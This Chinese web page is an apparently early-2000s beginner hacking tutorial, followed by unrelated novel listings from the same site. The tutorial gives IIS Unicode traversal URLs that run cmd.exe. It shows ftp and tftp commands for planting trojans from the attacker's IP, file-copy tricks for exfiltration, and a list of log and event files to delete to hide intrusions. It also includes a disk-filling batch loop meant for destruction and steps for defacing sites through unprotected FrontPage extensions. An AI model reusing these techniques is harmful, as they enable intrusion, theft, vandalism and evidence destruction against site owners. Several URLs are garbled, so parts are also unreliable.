登陆注册
178000000007

黑客初级技术讲解(下续三)

基础知识(3)

上传,这个我们后面介绍。

几点忠告:

1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

2,echo前记得帮他们做好备份

3,不准在主页里加入恶性语句

2,下载文件

要是有什么有用的文件被你发现,那我们如何下载呢?

最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。

别的方法:对不起,没想好:)

3,最重要的上传

一般方法:ftp法

首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧

echo+open ftp.cshu.com(ftp主机) > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是用户名)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:\hehe.haha 要下载的文件

echo+quit >> c:\hehe.haha

完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)

别忘了先上传到ftp主机,不要做马大哈哦!

最简单的方法:tftp法。

这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

安装好后运行,别忘了设置好默认目录,否则会找不到文件

tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)

1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!

学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

4,如何清除痕迹

虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉!

四,细节问题。

1,遇到长文件名怎么办?

c:\program files就用c:\program20%files2,遇到空格怎么办?

%代替喽,或者xx yy=xxyy~1

基础知识(5)

%代替喽,或者xx yy=xxyy~1

3,如何做个很大的文件?

目的就是破坏啦!我不喜欢不过教教你们啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要乱来啊!

4,输入命令,没反应或反应不对。

:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!

http://www.exsample.com/scripts/ ... macr;..À

¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:不一定有用哦!

5,如何找到unicode漏洞的主机

呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

6,我copy,del文件,怎么显示aceess denined?

这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!

这个我会在今后介绍,现在你可以试试attrib

attrib -r -h -s c:\autoexec.bat

再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!

7,我黑了主页,天下无敌?

我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!

对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!

要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择

8,我如何做更多的事?

第一,努力提高权限

第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!

一,frontpage扩展攻击。

为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!

具体做法:

1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。

3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入 http://11.11.22.22(我习惯用这个做例子,以...僮魍澄募恕?/a>

4,万一跳出错误信息,表示有密码(这个不算注意文明用语)这时我们试着用以下url, http://11.11.22.22/_vti_pvt/service.pwd,这...盎箍梢愿耐场?/a>

我的看法:

这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。

同类推荐
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
  • 计算机探密

    计算机探密

    黑客的精神态度是很重要的,但技术则更是重要.黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变.要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言.也就是说,你必会学还了C之外的东西,你至少还要会LIS/P或Perl(Java也正在努力的挤上这个名单;译者注: 我很怀疑这份名单).除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习.
  • 演讲的艺术
热门推荐
  • 暗宫

    暗宫

    他日如若君临天下,必将平定八荒蛮夷以正河山。
  • 愚武传

    愚武传

    镇武侯受天命镇慑江湖武道,剿灭武道败类,终惹灭门大祸,仅身怀六甲小妾逃出生天,但也动了胎气,生出资质愚钝甚至有点傻气的婴儿,事事慢人一拍,似终生无望问顶天人交感的武道巅峰,进入上品级别的武道宗师境界。但三大忠心耿耿的铁卫却心有不甘,拼命也要将世子领入武道,加上其不学有术,半通八卦相学的舅老爷另辟奇径,欲为傻儿量身打造他的武道之路……武道有九品,从九至一,有九九归一之玄机,入门即为九品武者,每品之间都有巨大的蜕变与阻隔,是为入品易,进品难!上上品之上还有窥天地造化的超凡入圣……
  • 无敌中国人

    无敌中国人

    <无敌中国人>是一部长篇历史军事体裁小说。主人公仲国仁,后改为中国人,他从小离家,15岁入伙当土匪,25岁蹬上通天寨头一把交椅,成为上百人马的大当家。主人公靠一匹白马,两把匣枪,驰逞在东北嫩江两岸。主人公虽是土匪,他却与其他土匪截然不同,他杀贪官污吏,抢恶霸土豪,他不但不抢穷人一分钱一粒粮食,还把抢来的衣物粮食分给当地穷人。更让百姓敬佩的是,他有一颗爱国爱民赤子之心,他还敢打敢杀日本强盗,曾与日冠展开多次交锋。后来因抗联进入,主人公认清形势,毅然决然放弃土匪行业,率手下众兄弟一同投奔抗联,从此正式走上抗日救国新的征程,,,
  • 我心永恒之遥远的记忆

    我心永恒之遥远的记忆

    一个黑暗势力的长公主,却长着一颗晶莹剔透的光明之心,坚信并发誓自己的坚持是对的,是有意义的,更是说服了未婚夫看管她的躯体等她魂穿时空牢笼带来新的证据说服这一帮势力愚臣,支持她改建光明开创全新纪元。可怜的公主,未来的女皇,从此经历了所有匪夷所思不可思议的黑暗较量,辛苦的坚持着遥远记忆中对光的执着眷恋。同样可怜的还有她的未婚夫……这对原本可以在星外文明享福的苦命鸳鸯啊
  • 陌漓

    陌漓

    时间是最无情的东西,它带走了我所珍视的东西。现在的我后悔了,可是,你还会在原地等我吗?
  • 欲神说

    欲神说

    五岁的时候,有一个女人对他说‘我很喜欢你,要带你走’,他信了,所以他去问另一个女人,另一个女人说‘不许你走,我也很喜欢你’,他也信了。最后两个女人打起来了,另一个女人打不过那个女人,所以他跟那个女人走了。之后,他给那个女人洗了一年衣服做了一年饭,他就问那个女人‘你不是说喜欢我么’,那个女人说‘女人的话你都信,再洗十年’,结果他洗到十八岁。所以他从五岁的时候就知道,女人的话千万不要信。只是,他怎么也想不通,为什么他总是能碰上那些极品的女人……
  • 遇见火星女孩

    遇见火星女孩

    外号叫“小撒旦”的女生,有着假小子的外表和性格。她自小和邻居女孩玛莎感情深厚,而玛莎有巷奇特的身世。她在某个星星唱歌的夜晚,降临在养母的门口。美丽、乖巧又善解人意的玛莎。不仅得到了小撒旦的喜欢和依恋,而且深受养母及哥哥大郭的宠爱。可惜。玛莎在一个流星雨之夜忽然消失了,从此杳无昔信。玛莎离去一年之后,小撒旦的班里忽然来了一个新同学。她自称“火星girl”。火星女孩在很多地方与玛莎非常相似。这引起了小撤旦和大郭的注意。火星女孩最终也离大家而去,只留下同学们对她的无限怀念和惆怅……多年后,小撤旦和大郭都从大学毕业了。大郭成了一名航天员,登上了火星。在火星的奇异世界里,他看到了不可思议的景象……
  • 恶魔校草的笨蛋甜心

    恶魔校草的笨蛋甜心

    他们是人们眼中的完美情侣,暗地里却像是仇人,她的恋爱态度是冷,冷,冷,而他的恋爱态度啊睡,睡,睡第一次,他把她压在墙上,墙咚,却被她反手一拧,脱臼了;第二次,他把她压在办公桌上,桌咚,这次被她弄得脚脱臼了;第三次,压在床上,“老婆,你怎么这么狠心,把我都快弄残废了。”她却说:“这次为妻会好好服侍夫君你的。”经过他的不懈努力,终于成功扑倒,吃到肉肉~【男女主身心健康,请放心入坑~】
  • 鬼王独宠:染指腹黑小王妃

    鬼王独宠:染指腹黑小王妃

    “我吻了你,摸了你,还要了你。”她眉梢轻抬,“不用你负责。”他垂眉冷对,“可是,你必须对我负责,我很纯。”“滚!”“好,今晚继续肢体运动。”当腹黑,乖张,皎如明月的她。对上鬼魅,邪戾,睥睨天下的他,是痴缠错爱还是一曲旷世绝恋?皇权替亡,谋谜阴阳,咫尺情淀,几度殇肠。
  • 福妻驾到

    福妻驾到

    现代饭店彪悍老板娘魂穿古代。不分是非的极品婆婆?三年未归生死不明的丈夫?心狠手辣的阴毒亲戚?贪婪而好色的地主老财?吃上顿没下顿的贫困宭境?不怕不怕,神仙相助,一技在手,天下我有!且看现代张悦娘,如何身带福气玩转古代,开面馆、收小弟、左纳财富,右傍美男,共绘幸福生活大好蓝图!!!!快本新书《天媒地聘》已经上架开始销售,只要3.99元即可将整本书抱回家,你还等什么哪,赶紧点击下面的直通车,享受乐乐精心为您准备的美食盛宴吧!)